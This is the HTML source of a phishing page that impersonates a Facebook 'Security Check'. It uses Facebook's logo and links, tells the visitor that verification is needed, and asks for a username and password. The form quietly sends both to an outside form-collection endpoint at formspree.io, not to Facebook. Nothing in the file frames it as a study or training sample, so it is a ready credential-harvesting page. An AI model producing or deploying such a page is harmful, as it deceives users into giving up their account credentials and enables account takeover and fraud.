<!-- CODED BY AJAY GUPTA -->
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Security Check</title>
	<link rel="shortcut icon" type="ico" href="images/fb-ico.png">
	<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
	<header>
		<div class="main-header">
			<div class="logo">
				<a href="http://www.facebook.com"><img src="images/logo.png" alt="Facebook"></a>
			</div>
		</div>
	</header>
	<section>
		<div class="form">
			<div class="m-header">
				<h3>Facebook Security Check</h3>
			</div>
			<div class="red-box">
				<p style="font-weight:bold; font-size:13px">Verification needed to understand it's you</p>
				<p>Enter your password for security reasons (make sure you have caps lock turned off)</p>
				<p>Forgot your password? <a href="http://www.facebook.com">Reset your password</a>
			</div>

			<div class="login-form">
				 <form id="my-form"action="https://formspree.io/f/xqkjlnea"  method="Post">
					<label for="username">username:</label>
					<input name="username" type="text" id="username"></input><br /><br />
					<label for="password">Password:</label>
					<input name="password" id="password" type="password" style="margin-left: 30px;"></input><br />
					<input id="keep" style="margin: 10px 0 0 84px" type="checkbox"></input>
					<label for="keep" style="font-size:12px;">keep me logged in</label><br />
					<input type="submit" value="Verify" style="padding:10px; margin-left:100px; border-radius:10px; margin-top:10px; width:20%; background:#4267B2; color:white;"></input><br><br>
			<!--		<p style="margin-right:30px;"><a style="text-decoration:none; color:#3B5998; margin:0 0 0 80px; margin-right:30px;" href="facebook.com">can't log in?</a></p>
-->
<h6>By using Facebook, You agree to the Facebook Terms and Conditions</h6>
				</form>
			<p id="my-form-status"></p>
			</div>

		</div>
		
		<footer>
			<ul>
				<li><a href="/">Mobile</a></li>
				<li><a href="/">Find Friends</a></li>
				<li><a href="/">Badges</a></li>
				<li><a href="/">People</a></li>
				<li><a href="/">Pages</a></li>
				<li><a href="/">Apps</a></li>
				<li><a href="/">Games</a></li>
				<li><a href="/">Music</a></li>
				<li><a href="/">Locations</a></li>
			</ul>
			<ul>
				<li><a href="/">Topics</a></li>
				<li><a href="/">About</a></li>
				<li><a href="/">Create Ad</a></li>
				<li><a href="/">Create Page</a></li>
				<li><a href="/">Devepers</a></li>
				<li><a href="/">Careers</a></li>
				<li><a href="/">Privacy</a></li>
				<li><a href="/">Cookies</a></li>
				<li><a href="/">Terms</a></li><br />
				<li><a href="/">Help</a></li>
			</ul>
		</footer>
	</section>
</body>

</html>
